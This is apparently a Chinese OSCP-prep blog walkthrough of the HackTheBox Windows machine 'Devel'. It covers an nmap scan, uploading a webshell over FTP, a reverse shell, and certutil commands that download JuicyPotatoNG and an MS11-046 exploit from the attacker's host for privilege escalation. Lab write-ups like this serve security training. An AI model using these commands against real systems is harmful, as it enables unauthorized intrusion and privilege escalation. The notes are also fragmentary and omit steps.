OSCP备考_0x38_HackThBox靶机_Windows_Devel

Ethan医生2个月前 (07-09)靶场81

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.254.198 (扫描TCP)

使用ftp进行连接

ftp 10.129.254.198 21

上传webshell以后使用webshell进行反弹

由于直接使用都会端开这边找到

进行反弹

开始进行提权

尝试下载提权土豆

certutil -urlcache -split -f "http://10.10.16.43:8000/EXE/JuicyPotatoNG.exe" JuicyPotatoNG.exe

然后执行提权

根據google的結果，發現有MS11–046的漏洞，並在github找到exploit可以拿來利用。

certutil -urlcache -split -f "http://10.10.16.43:8000/ms11-046.exe" ms11-046.exe

标签: OSCP

返回列表

名称说明靶机下载链接https://www.vulnhub.com/entry/pwnlab-init,158/攻击机（kali）ip：192.168.233.168靶机（CentOS）ip：192....

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.2.29 (扫描TCP)svn list svn://10.129.2.29svn lo...

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.253.131 (扫描TCP)查看到是Drupal 7.54ruby 44449.rb...

OSCP备考_0x54_HackThBox靶机_Windows_remotenmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.230.172&nbs...

刚报考的第二天发现LAB一直断,之后购买VPS 阿里云-新加坡服务器记得需要注意防火墙,使用的协议如果是TCP就使用TCP UDP就使用UDP下面解决HTB或OSCP的 openvpn都是可以的非常...

名称说明靶机下载链接攻击机（kali）ip：192.168.233.168靶机（CentOS）ip：192.168.233.184arp-scan 192.168.233.1/24nmap -p- 1...

EthanDoctor